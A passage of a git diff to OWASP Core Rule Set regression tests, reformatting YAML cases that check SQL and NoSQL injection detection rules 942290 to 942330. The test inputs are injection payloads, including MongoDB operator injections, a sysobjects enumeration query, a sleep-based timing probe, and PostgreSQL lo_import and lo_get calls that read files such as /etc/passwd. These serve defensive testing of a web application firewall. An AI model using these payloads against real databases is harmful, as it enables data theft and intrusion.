127.0.0.1 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$ne]=2" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 2 desc: "basic MongoDB NOSQL injection attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_id: 3 desc: "basic MongoDB NOSQL injection attempts 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_id: 4 desc: "basic MongoDB NOSQL injection attempts 3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_id: 5 desc: "basic MongoDB NOSQL injection attempts 4" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$not": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$not": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 6 desc: "basic MongoDB NOSQL injection attempts 5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$nor": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$nor": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 7 desc: "basic MongoDB NOSQL injection attempts 6" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$where": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$where": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 8 desc: "basic MongoDB NOSQL injection attempts 7" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$elemMatch": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$elemMatch": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 9 desc: "basic MongoDB NOSQL injection attempts 8" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$text": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$text": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f6a801990..d3f7b1634 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -2,57 +2,52 @@ meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" description: None - enabled: true - name: 942300.yaml tests: - - test_title: 942300-1 + - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_id: 2 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_id: 3 desc: "No false positives with for. Issue #2007" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=booked%20for%202021%28including%202020" - version: HTTP/1.0 - output: - no_log_contains: id "942300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + no_log_contains: id "942300" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 1e34f1e4f..d0e5ccb39 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -2,62 +2,57 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942310.yaml tests: - - test_title: 942310-1 + - test_id: 1 desc: | Chained SQL injection attempts 2/2. This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). This test now checks that no match occurs for something that would have matched the original expression. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - no_log_contains: id "942310" - - test_title: 942310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + no_log_contains: id "942310" + - test_id: 2 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" - version: HTTP/1.0 - output: - log_contains: id "942310" - - test_title: 942310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log_contains: id "942310" + - test_id: 3 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" - version: HTTP/1.0 - output: - log_contains: id "942310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log_contains: id "942310" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 94b3ae37f..d582ea30f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -2,218 +2,203 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" description: None - enabled: true - name: 942320.yaml tests: - - test_title: 942320-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 5 desc: "Detects PostgreSQL data conversion with ::int" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=password::int" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=password::int" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 6 desc: "Detects PostgreSQL data conversion with ::bool" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 7 desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div(23,-2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 8 desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div+(23.23+,+2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 9 desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 10 desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_get(16400)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 11 desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::text" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 12 desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::bigint" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 13 desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::double%20precision" - version: HTTP/1.0 - output: - log_contains: id "942320" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index 2ebdb6753..ef72590e2 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -1,38 +1,34 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 942321.yaml tests: - - test_title: 942321-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16200),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" - - test_title: 942321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942321" + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: overlay(password placing $$$$ from 1)::int and id=1 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942321" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 6cee8d0ce..2538176c3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -2,93 +2,86 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942330.yaml tests: - - test_title: 942330-1 + - test_id: 1 desc: "classic SQL injection probings 1/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_id: 2 desc: "Test first backslash match ([\"'`\x5c]*?)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\\"1 or 1-" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_id: 3 desc: "Test second backslash match (\x5cx(?:23|27|3d))" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\x23" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\x23" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_id: 4 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - "var=05111222333 - andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" - - test_title: 942330-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" + - test_id: 5 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=05111222333 andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=05111222333 andy.surname@somedomain.com" + 